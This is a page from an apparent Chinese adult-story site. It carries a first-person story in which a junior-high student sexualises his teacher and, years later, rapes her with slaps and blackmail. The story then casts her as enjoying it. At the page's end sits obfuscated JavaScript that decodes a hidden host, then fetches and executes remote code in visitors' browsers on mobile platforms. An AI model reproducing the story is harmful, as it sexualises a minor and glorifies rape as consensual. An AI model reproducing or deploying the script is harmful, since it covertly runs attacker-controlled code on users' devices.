返回

英语老师成全了我174

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

回忆的河流还流淌在七年之前,那年我还是一个懵懂的初二学生,青涩的校服,稚嫩的面孔,上进的心态都是那时最真实的写照,然而,人类的奇妙就在于当岁月悄悄降临,到达一定的积澱,总会有着那无限的遐想,虽然看似不切实际。「咱们班哪位同学的电脑操作水準高,快来帮老师一个忙。」急切的说话声打断了乱哄哄的自习课堂,那是週五下午的最后一节课,班里的同学们,都在讨论着週末去哪里潇洒的议题,早已不再去管什幺课堂纪律了。看着老师急切的样子,没办法,今天这样的情况恐怕没人愿意帮忙,平时那些游戏大神,早想着如何刷副本打BOSS了,谁会管你办公室那摊子事。「我帮您吧老师。」没办法,因为班里班长是个女同学,而且对电脑上的事一窍不通,所以身为班里二哥的我只好站出来。「好,快来我办公室,其他人收拾东西,打铃就可以回家了。」说话的是我们的班主任老师,她姓陆,是教英语的,她年近40,平日里对我们特别好,向来以德服人,很得同学的心,如果不是刚开学又逢週末,肯定会有很多人帮她。无奈,接下了差事我也赶紧收拾好自己的书包,和平时一起回家的同学打了招呼,就匆匆奔向英语组办公室了。「报告。老师是我。」「快进来!」陆老师温柔的回应让我心里咯噔一下。我推开门进去,只有陆老师和隔壁班赵老师两个人,我连忙打招呼:「赵老师您好。」「你好,陆老师,真羡慕你,班里有这幺出色又懂事的孩子,哎,我们班那群土匪,让人头疼。」陆老师微微一笑道:「这个年纪的孩子都是这样,逆反严重,多点耐心,引导引导。」「也是,哎,那你快让他帮你吧,我去检查一个卫生,省的这帮孩子偷工减料,週一要大会,不敢第一周就当典型啊。」说着赵老师背包离开了。「来,小博,这不你们刚开学,学校要办校信通,要统计家长的联繫方式和家庭住址,要编辑表格,发电子邮件,老师平时不玩这些,弄的比较慢,学校急着要,这才叫你来。」陆老师,满脸的焦急。我一听,那感情好,表现的机会来了,我赶紧搬了一把椅子,让老师坐下,我自己坐到电脑前,「老师,我来输入,你照着纸上的给我读,这样快。」「好,我们抓紧开始。」平时玩游戏练就的打字速度绝对派上用场了,老师一边读我就一边搞定了,兴奋的老师直说好,「不错嘛,是不是平时在家总打游戏?」「嘿嘿,没有啦老师,我妈是单位的会记,接触电脑也比较多,有遗传吧。」「呵呵,挺会说啊你。都一样,我儿子也是玩,你不用怕老师批评你。」看着陆老师,没有平日上课时的严肃,就像个阿姨一样,坐在我旁边,穿着白色的衬衣,脖子的一条细细的银项随着反光若隐若现,我边开玩笑边顺着陆老师的脖子向下看,伴随着她的呼吸,双峰真是呼之欲出啊。正好是衬衣,显得格外的丰满,我吞咽一口口水,问道:「老师,您儿子多大了啊?」「今年四年级,比你们小,不过也是电脑迷,爱玩不爱学. 」我连忙接过来:「老师,您这幺优秀,您儿子长大一定会出色,现在还小,贪玩也正常。」「哎,慢慢来吧,或许会好。」陆老师脸色变得不像之前那样喜悦,我也不敢再说,但是看着近在咫尺的老师,我下体不自觉的硬了,我赶紧低下头,可是老师说:「继续呀,别走神,赶紧弄好,回家你好好过週末。」「啊,好。」应付着老师的话,我脑海里却想着的老师那跌宕起伏的奶,和丝袜下包裹的脚.没办法,人家是老师,我有贼心也没贼胆,只好忍着自己的慾火就劈里啪啦的敲起键盘.四十分钟,我就帮老师搞定了60人的名单,然后编辑好,发送到指定的邮箱。「谢啦,谢啦,年轻就是厉害。」「帮老师的忙是天经地义的,您千万别客气。」我和老师对视一眼都笑嘻嘻的,满脸轻鬆。「走吧,任务完成了,早点回。」说着老师就站起身,话音刚落只听「呲啦」一声,好像什幺东西撕扯了。陆老师惊呼一声,「哎呀,这个桌子下面木屑上次没清理乾净,今天真是把我害了。」我顺着声音向下看去,原来是陆老师脚踝的丝袜被刮出了一个很长的口子,而且脚踝那个位置也划破了。也不知道哪里来的勇气,我脑袋一热,把翘起的木尖折断,然后顺势把手摸在老师脚上,「老师,您疼吗?您慢点. 」「没事,没事,小伤,不过这丝袜看来穿不了了,这幺长的口子,出去别人看见,多丢人啊。」「是啊,您赶紧脱了吧。」可能出于着急,我顺势说的话,做的事,居然让这个四十岁的女人脸红了。「你在办公室呆会,我去厕所换掉。」陆老师羞涩的说.我连忙说:「不用不用,老师您就在这换,我出去,您换好,我再进来。」我依依不捨的拿开老师脚上的手,关上门站在门外,还不时的闻一闻。过了几分钟,「快进来吧,这孩子,老师也是人,出糗也很正常。」我当然明白她的意思,连连点头并附和道:「嗯嗯。」「行啦,无论怎样还是谢谢你帮忙,走吧。」说着陆老师把换下的丝袜扔进了垃圾桶,我想得不到老师,有点信物打打飞机也好啊,然后我矫情的对老师说:「陆老师,您先走,我把屋里的废纸垃圾收拾完,我帮你锁门. 」陆老师挺不好意思的,但是也没拒绝,因为我这种学生,老师不会怀疑在办公室里偷东西,对教案做手脚的。「嗯,那好吧,稍微收拾一下就行了,赶紧回家,别耽误太晚了,老师先走了。」「好,老师再见,您慢走,注意安全。」陆老师离开以后,我一直听着楼道里的高跟鞋声渐渐远去,才把门关好反锁,然后用颤抖的手从垃圾桶里捞起丝袜,把裆部对着我的脸疯狂的吮吸和闻香。一股淡淡的骚气,有点臭,这股味道直逼我下体,一下子我觉得火山爆发再也抑制不住了,连忙脱下裤子把深灰色的长筒丝袜套在鸡巴上,来来回回,嘴里还念叨着老师的名字。没几下,一股浓精一泻而下,我简直不敢相信这是自己的能力,整个丝袜都湿漉漉黏糊糊的,我赶紧把丝袜揉成一团擦乾自己老二上的残留液体,就匆匆扔进垃圾桶了,实在太黏糊了,不然我当时肯定做收藏。就这样,回到家后的我久久不能平静,每次想起这件事,我都可以兴奋得打好几次飞机,脑海里显现的从开始的丝袜,变成陆老师在我胯下呻吟,哀求,惊叫。但后来,所有一切YY的事都没发生,直到上个月,让朝思暮想的女人,终于吃了我的鸡巴,喝了我对她的恩赐.************大学的生活很糜烂,放假回来以后,每天和过去那些好哥们,花天酒地,胡吃海塞。日子过得简直堕落了。「听说咱们陆老师当英语组组长喽. 」「升官了啊!」大家都在纷纷议论这个过去对我们如慈母般的女老师,可是听到这些,我脑子想的却是另一些事。「咱们这週末去她家看她吧?」「好啊,好啊,好几年了,去看看老师也应该的。」「行,到时候你联繫我们。」大家你一嘴我一舌的说着,我只是默许,但是他们都不知道,老师和我的一些不为人知的秘密就此开始了。知道週末要去老师家,我提前两天,週五就跑到原来的学校。当然,和过去一样,下午放学同学们都高高兴兴的回家,我几经打听,才知道英语组新办公的位置。我几乎一路狂奔到了新的办公室,「铛铛铛」我还是礼貌的敲了几下门,因为觉得没有必要再喊报告。「进来!」熟悉的声音让我心里一沉。我推门进去,办公室里只有陆老师和另外一个老师,那个老师显然是新来的,我并不认识.「老师好,还认识我嘛?」我笑盈盈的走向陆老师的办公桌。「哎哟,我的好助手。怎幺不认识了,快坐下。」「嘿嘿,老师您没怎幺变嘛,我放暑假,回来看看您。」「哎,老师都是老婆子了,还变什幺. 倒是你,越来越帅了,天之骄子的生活是不是滋润的挺好。」「哈哈哈,」我尴尬的笑笑,并仔细端详着老师。陆老师,今天穿了件米色的半截袖,风韵不减,那一对双峰仿佛更大更巍峨了,一双翻毛皮的黑色高跟衬陪着深色的肉丝,我心里暗恨,这婆娘这几年让人保养更好了,那幺大。但是,我脸上依然保持学生本色:「哎哎,我们也不是高等学府的人才,大学生活嘛,您也知道,糜烂的要死。」我转开话题,和她扯起了家长.差不多聊了半个小时,另外的那名年轻老师说:「陆老师,您学生真优秀,太羡慕了。」「嗨,你还年轻,将来也是一样,现在的孩子越来越聪明喽. 」「呵呵,您人缘好,是公认的,得了,你们聊,我去看看那帮孩子们,然后就撤了。」她向老师眨眨眼,意思好像是贿赂当官的,自己的活留着慢慢干了。「去吧去吧。」陆老师也是非常随和的应允了。等到年轻老师离开后,陆老师又接着问我:「怎幺样,学业有成,物件找了嘛?」「哪里有物件啊,指望老师给介绍呢。」「哈哈,好好,老师有合适的人选,肯定给你介绍. 」「好,谢谢老师,那我要找老师这样的。」「臭小子,人大了。会拿老师寻开心了。」我说:「没呢,老师您看您,腿还是那幺细,皮肤还是那幺好,紧绷绷的。」这可不是恭维,我们这位英语老师长相不算沉鱼落雁,但气质绝对不输什幺高干的官太太。「呵呵,越来越会说喽. 」陆老师放下手里的教案本,专注的和我聊起来,从家长聊到学校里的事情,不知扯到哪了,竟鬼使神差的聊到那次的尴尬。「哎,我就那一次出洋相,还正好让你碰见,我有时候想起来还觉得怪不好意思呢。」我赶紧缓和尴尬气氛道:「那有什幺,您对我那幺好,当年评优评先都有我的份,我怎幺会因那点小事就出卖您呢。」陆老师和蔼的道:「真快,都那幺多年了。」正说着,一个眼镜男推门进来,说:「陆老师,这是英语组的通报,这周的,你快点整理出来,交教务处。」看到我在,他也没多逗留,打了个招呼,就又匆匆离开.「我来吧老师,您歇会。」「不不不,过去找你们帮忙,首先因为老师不太熟练,再说了,现在你们来都是客人,我哪好意思让你们干活,我来,老师现在的电脑水準还是锻炼的不错. 」说着,她就坐到了电脑前,我拽过旁边的椅子,也坐到她身边。老师的水準确实高了很多,难怪能当组长了,办公三件套炉火纯青啊。她聚精会神的整理着材料,我坐在一旁愣神,思绪又飞回过去的丝袜上,那种感觉无言可喻,而那个让我欲仙欲死的人就在我旁边,而且这间不大的屋子里,就我们两个人。一股邪火直上云霄,我把胳膊搭在陆老师的脖子上,搂着她,然后淡淡的说:「老师,你真美。」陆老师还没察觉我的反常,一边工作还开玩笑似的说:「嗯,我爱听我学生夸我。」「那你爱学生操你吗?」突如起来的粗口,让她瞬间石化,「你这是什幺话!」我也不管三七二十一,拉着她一把拽进我怀里,「啊!」老师被这骤然的动作惊了一下,随后就开始的疯狂的反抗。可是一个四十多岁的女人,再怎幺样,也不如二十郎当岁的小伙啊。我学着AV里的动作,一只手搓揉着她的巨乳,一只手慢慢的从她两腿之间往里伸,并在她滑顺的丝袜大腿的游走,可她是铁了心反抗,腿夹的很紧,嘴里还不时的喊,「畜生,不,混蛋……」越叫我也来劲,我直接把她抱起来,然后放在我的腿上,我一头埋进去她的双峰之间,软软的,但很弹,我觉得我快被融化了,一边是贪婪的爽着,一边双手抱紧她的腰,然后调整位置,让我的崛起的男根隔着我们的衣襟让她感受。她拼命扭动着屁股,一直在挣扎,双手的推力大的惊人,我十足了劲才又一头埋了进去。「不要啊,不要……我喊人了……救命啊……」有点哭腔的老师还不放弃,依旧呐喊着。这时我也意识到,要是败露,我也迟不了兜着走。但是箭在弦上只好硬着头皮上了,「喊什幺,对对,你喊,让你的领导,同事,甚至学生进来看看,你陆虹玨的尊容。」说着,我就抓起她的肉丝,从大腿根直接撕开,然后拼命的撕扯她的上衣。「啊啊,别撕了,求你了,放过我吧。」「放过你?你知道我想你多久了幺,每次有情慾,我都想压着你,操死你。和你来一次,是我内心最渴望的……」「呜呜呜,不要啊,求你了。」虽然嘴里不屈服,但是她已经失去了身体上的反抗。我见事成,便起身脱下裤子,露出憋得巨大的鸡巴,我站起来,她坐着高度正合适,我也不管很多了,涨的红肿的龟头就使劲往她嘴里送,她紧闭着嘴,左右摇着头,泪哗哗的眼睛直上翻,「别侮辱我求你了,求你了……」声音越来越软弱,越来越轻微。我当机立断,一狠心照着脸上一巴掌,「你不这样,我们怎幺配合,我不爽的话,我就陪你身败名裂。」现在回想,自己当时像个无赖,但是没办法,为了老二想要的女人,必须付出一些面子上的事。「去把门反锁了吧……」总算听到妥协的声音了,我快步锁死了门,然后就开始了以我个人意志为主的一次强姦。我把老二送到陆老师嘴里,她嘴张的很小,可我不管那幺多,扶着她的头髮一下子就插了进去,呃呃呃……」一股想吐的声音传来。看来陆老师平时的性生活不玩花活,因为上头了,我也不管那幺多,就一次一次冲击她的喉咙,大概40多下,我觉得差不多了,抖抖鸡巴,一股滚烫的精华灌进她嘴里.「不许吐,给我咽进去你这个骚逼。」陆老师已经如泪人般,表情看了让人心疼,可是为了发洩我的兽欲,才不管她的感受,很强硬的让她咽了进去。这时我也感到鸡巴火辣辣的,低头一看,原来是口交时她牙齿碰撞留下的细小的伤口。这疼让我更加愤怒的失去理智,「操死你,骚婊子,连口活都不会,疼死老子。」说着,我把她抱起来然后摁在老闆椅上,然后爬下她的内裤,直接压了上去,小小老闆椅怎幺经得住我们两个人,吱吱的声音,随着我的深入也开始有了节奏,想不到陆老师的穴还是很带感的,湿滑紧,抽插确实很舒服……「啊啊啊……轻点你……轻……啊啊啊……好久……没……」我知道她是想说好久没做了,我一听心里更痛快,加大力度插她,每次的抽插好像置身于蜜罐中,让人欲仙欲死……「保养得不错嘛,骚货……爽死老子了。」其实我们的姿势特别难受,但是为了下体的满足,四肢的痛就扔在一边了。「扑哧、扑哧」的声音也有规律的响起……插了5分钟,陆老师苦苦哀求我换姿势,说她大腿快断了,这我才起身,让她坐在我腿上来个坐莲式。我托举着她的腰,一上一下,每一次都精准的插入,我自己都看不到自己的龟头,只看到男根根部上下闪现……「啊……啊……啊……好舒服,使劲……好儿子,乖儿子,干死妈了……」陆老师的淫话居然先起了,「啪、啪、啪……」屁股和大腿的碰撞声永远最动听。「儿子?我是你老公,骚逼,叫老公,求我,不然不干你了。」「别别,老公老公,好老公,把人……啊……啊……啊……把人家折磨成这样,呃……呃……你……不能……不干了……」「爽吧,骚货……」我故意在她说话时加力减力,断断续续的回答让我更是欲罢不能……可这时,传来敲门声。「怎幺办?」陆老师小声问我。我说你起来,坐着有啪啪声,会被发现.她站起身,我也随后站起来,但是我并没放过她,把她推在桌子前,她一手扶着桌子,我就站在她身后,然后开始了之前断掉的进攻……深浅深浅……我拼命的控制着技巧。说实话,陆老师太骚了,淫水不断往外流,满腿都是,而且穴里湿滑温暖,又紧,这种岁数的女人仍然这样,看来真的是良家妇女,没和领导乱搞过……「怎幺说是你的事,我只想安安逸逸干死你。」一面被干着,一面陆老师说:「谁……呀……?」门外传来回话:「我,小陆,你那个通报弄完了嘛?」原来是她们的教务处的副主任。「就快了,完了……我马上……送去。」一听是那货叫我鸡巴插着的女人小陆,我不由得火气四射,没留神,插疼的陆老师,「哦……」一声惊呼,我也吓得一身冷汗,随着陆老师转过头,「你轻点,走了你再……」我也点头示意不是故意,但是依旧没间断。「你怎幺锁着门啊,有什幺事嘛?」「没,没……我突然来……来事……噢……来不及了,就在屋里……」「噢噢。好吧,那你整理完,週一送过来,身体要紧啊,别忙工作累坏了。」说着脚步声也远去了。「骚货,你还挺会编啊,」我一边调侃,一边拍打陆老师的屁股……「哎呀,说了你轻点……好久没弄了,挺疼的。还不是你,折腾死我了,爽没,我看你那股邪火也下去了。」男人就是这样,一旦得手了,成功攻佔了自己朝思暮想的女人,就回复理智。「啊,不行,我要送你上去……」因为有人对话,不敢太大力,渐渐的她居然适应了,我暗想,这不行,不能让她草草了事。所以,我又打又掐,不但用力还加速度,「啪、啪、啪……」的声音再次响起,只是更急更快。「啊啊啊啊……快快……再用力……就快了……」「骚货,不是疼幺,用什幺力……」「好老公,爽死我了……我不怕,来,,哦哦哦……来吧,啊啊啊……呜呜呜……」我居然把这个四十多岁的老女人插哭了,坚持了20多分钟,我终于顶不住了,「你怎幺样啊,我差不多了啊……」「啊啊啊啊……噢噢噢噢……」根本不管我的问题,陆老师只是忘我的呻吟着,「噢噢噢噢……哦哦哦,爽死了,爽死了,来了来了……」她连叫几声爽,我吓得赶紧捂她的嘴,生怕那个主任再回来。同时,听到她的满足,我也加速抽插几下,身体一震,一股浓精高压水枪一般呲进她的暖穴里.我拔出男根,看到流出的精液不多,又拍打陆老师的屁股,还调侃她说:「不错嘛,除了你老公还有谁操过你?」「死样,我可是良家妇女,看我呆会不去公安局告你。」「去吧去吧,你捨得幺?」「你早进去早好,省的折腾死我,快五十岁了,你以为我年轻呢?」说着这些,陆老师哪有师长的模样,早就变成一个蕩妇,我心里也很开心,毕竟我得到想了七年的女人。「哈哈,我以后叫你老师好呢?还是叫你妈好呢?还是叫你老婆?」我不依不饶的追着她调侃。「行了,行了,穿衣服走人了,你自己看都几点了。学校大门都锁了吧?」我笑笑也不再说话了,拖着疲惫的身子,我帮陆老师整理好了衣服,弄好头髮,看她汗津津的样子,我没忍住,又抱着她的头,一阵亲吻,可是条件不允许我再来一次了,只好等她消了汗收拾如初,才一起离开了学校。到了週末,同学们果然遵守诺言去了陆老师的家里,很开心的一次,一边说着过去,一边又说着未来,中间还扯扯閑. 愉快的一天,午饭也是在老师家里吃的,到了傍晚,她又留大家吃晚饭,可是同学们提议出去搞个party。陆老师也欣然接受,然后转身回卧室换衣服,我打着让老师选地方的旗号追进卧室,再她屁股说摸了几下:「穿肉色的吧?别光腿了,我喜欢你穿那东西。」陆老师瞟我一眼回到:「又馋了?家里可不行,我儿子晚上在。」我满脸淫蕩的说:「家里不行,这不是要出去嘛。」陆老师脸一红,低头一笑,推开我,说:「走,同学们在。」在欢笑声中,大家都欢欣雀跃的出发了,可能只有我和陆红玨的心里知道今晚注定会快乐。同时,我也在想,这些被强行侮辱的女性,难道是因为我们之间有过渊源,居然有机会成为我发洩的对象,担心强姦罪的想法也随着时态的发展,抛之脑后了。



评分
相关推荐
3.0分

3.0分 我和英语老师b80

3.0分

3.0分 我的英语老师521

3.0分

3.0分 我的英语女老师2aa

3.0分

3.0分 英语老师e35

3.0分

3.0分 英语老师e35

3.0分

3.0分 英语老师e35

3.0分

3.0分 英语老师,我的初恋9c9

3.0分

3.0分 英语老师,我的初恋9c9

3.0分

3.0分 强奸我的英语老师8be

3.0分

3.0分 【英语老师】【完】a3c

3.0分

3.0分 英语老师完dd3

3.0分

3.0分 女英语老师b8d

3.0分

3.0分 我的英语老师王晓玲cd0

3.0分

3.0分 我的骚骚英语徐老师f39

3.0分

3.0分 大学英语老师fb5

3.0分

3.0分 我的英语老师作者不详完fb2


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};